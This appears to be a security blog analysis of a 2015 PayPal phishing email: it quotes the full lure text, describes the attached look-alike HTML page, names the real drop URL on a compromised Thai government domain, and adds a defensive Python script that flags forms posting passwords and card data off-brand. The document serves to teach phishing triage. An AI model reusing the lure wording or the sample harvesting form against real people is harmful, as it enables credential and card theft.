Date: Jul 23, 2015 11:52:43 AM
From: "PayPal.com" <intl@lapyap.com>
To: *undisclosed recipients
Reply To: "PayPal.com" <intl@lapyap.com>
Subject: As a result we have temporarily suspended your account.
We have been given reason to believe that there maybe some question as to the authenticity of the information that you have uploaded to PayPal.com, or that you do not have permission/rights to modify them.
As a result we have temporarily suspended your account. You will note that our Terms of Use about your details or personal informations for to remove question that this action will be taken. You accepted these terms when you registered.
So that you may continue to enjoy the benefits that PayPal.com provides, would you be so kind as to confirm the following items via:
1. Download the attached document and open it in a secure browser.
2. Follow the verification process and give us your correct information.
The purpose of this verification is to confirm that you are the person who registered the account.
Accordingly the details you send must be correct, so that we can identify you.
Unfortunately we will not enter in to any further correspondence regarding the suspension of your profile until these items have been received and subsequent verification has taken place. It is regrettable that we have been given cause to take this action but will hope that you will agree that the success of the site and it’s advertisers is dependent on the authenticity of it’s advertisers.
Please DO NOT REPLY to this email as they will not be read. Please consult the Knowledge Base for further information.
With kind regards
The PayPal.com Team
The Attachment
This phishing email carries an attachment: an HTML file. Opened in a browser, it renders a replica of PayPal's website. Because the page is loaded from the local file rather than from paypal.com, the address bar shows a file:// path, so the usual advice to check the URL and the padlock does not help the victim. The page asks for personal information and for the victim's credit card details.
Overall Analysis
This email is a phishing attack targeting PayPal users. It tells the victim that there is a problem with their PayPal account and instructs them to verify their information through the attached file. The attachment collects the victim's personal information, PayPal password and credit card details and sends them to the attackers: the form in the HTML file posts to a PHP script at http://narathiwat.nfe.go.th/htaccess.php.
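The two findings above (a local HTML form that asks for credentials and card data, and an action URL on a host that has nothing to do with PayPal) are exactly what a triage script should pull out of such an attachment. The following is an added example, not code from the original post: it parses the HTML with the standard library, lists each form's action host and input names, and flags a form that collects sensitive fields while posting off-brand. The sample HTML is constructed as a stand-in for the real attachment (which the post does not reproduce); the field names are assumptions, the action URL is the one named in the post.

```python
"""Triage an HTML phishing attachment: where does its form post, and what does it ask for?

Added example, not part of the original post. SAMPLE_ATTACHMENT is a constructed
stand-in for the attachment; only the action URL comes from the post.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse

# Constructed sample: a minimal PayPal look-alike form. Field names are assumed.
SAMPLE_ATTACHMENT = """
<html><head><title>PayPal - Verify your account</title></head>
<body>
<img src="https://www.paypalobjects.com/logo.png">
<form method="POST" action="http://narathiwat.nfe.go.th/htaccess.php">
  <input type="email" name="login_email">
  <input type="password" name="login_password">
  <input type="text" name="card_number">
  <input type="text" name="cvv">
  <input type="hidden" name="step" value="1">
  <input type="submit" value="Continue">
</form>
</body></html>
"""

# Substrings that mark an input as collecting secrets or payment data.
SENSITIVE_HINTS = ("pass", "card", "cvv", "ccv", "pin", "ssn", "expir")


class FormExtractor(HTMLParser):
    """Collect every <form> with its action, method and user-visible input names."""

    def __init__(self):
        super().__init__()
        self.forms = []
        self._current = None

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)  # bare attributes map to None, hence the "or" defaults below
        if tag == "form":
            self._current = {
                "action": a.get("action") or "",
                "method": (a.get("method") or "GET").upper(),
                "fields": [],
            }
            self.forms.append(self._current)
        elif tag == "input" and self._current is not None:
            # Hidden/submit inputs carry kit state, not victim data; skip them.
            if (a.get("type") or "text").lower() not in ("submit", "hidden", "button"):
                self._current["fields"].append(a.get("name") or "")

    def handle_endtag(self, tag):
        if tag == "form":
            self._current = None


def triage(html, claimed_brand_domain="paypal.com"):
    """Return one finding per form: action host, fields, and whether it looks like a credential harvester."""
    parser = FormExtractor()
    parser.feed(html)
    findings = []
    for form in parser.forms:
        host = urlparse(form["action"]).hostname or ""
        # An empty host means the form posts to the file itself (or relies on JS);
        # anything else must be the brand's own domain or a subdomain of it.
        off_brand = host != "" and not (
            host == claimed_brand_domain or host.endswith("." + claimed_brand_domain)
        )
        sensitive = [n for n in form["fields"] if any(h in n.lower() for h in SENSITIVE_HINTS)]
        findings.append({
            "action_host": host,
            "method": form["method"],
            "fields": form["fields"],
            "sensitive_fields": sensitive,
            "posts_off_brand": off_brand,
            "suspicious": off_brand and bool(sensitive),
        })
    return findings


if __name__ == "__main__":
    for f in triage(SAMPLE_ATTACHMENT):
        print(f)
```

Run against the sample, the single form is reported as posting via POST to narathiwat.nfe.go.th with login_password, card_number and cvv among its fields, and is flagged suspicious. The check is deliberately static: it never submits the form, so it can be run on quarantined attachments without tipping off the operator or feeding the drop script. Kits that assemble the action URL in JavaScript will show an empty host here and need a second look by hand.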
Analysis of the Link
Domain: NFE.GO.TH
Registrar: T.H.NIC Co., Ltd.
Name Server: NS.JI-NET.COM
Name Server: NS2.JI-NET.COM
Status: ACTIVE
Updated date: 5 Feb 2015
Created date: 5 Nov 2007
Renew date: 17 Jan 2015
Exp date: 16 Jan 2016
Domain Holder: Nonformal Education Department
Ministry of Education, Rajadamneon Ave. Dusit, Bangkok
10300
TH
Tech Contact: 44731
Jasmine Internet Co., Ltd.
200 Moo 4, Chaengwatana Rd.,Pakkred, Nonthaburi
11120
TH
The domain is registered in Thailand to a government education department and has no relation to PayPal, which suggests the drop script was planted on a compromised server rather than on infrastructure the attackers own. The original post showed a screenshot of the domain's main page at this point.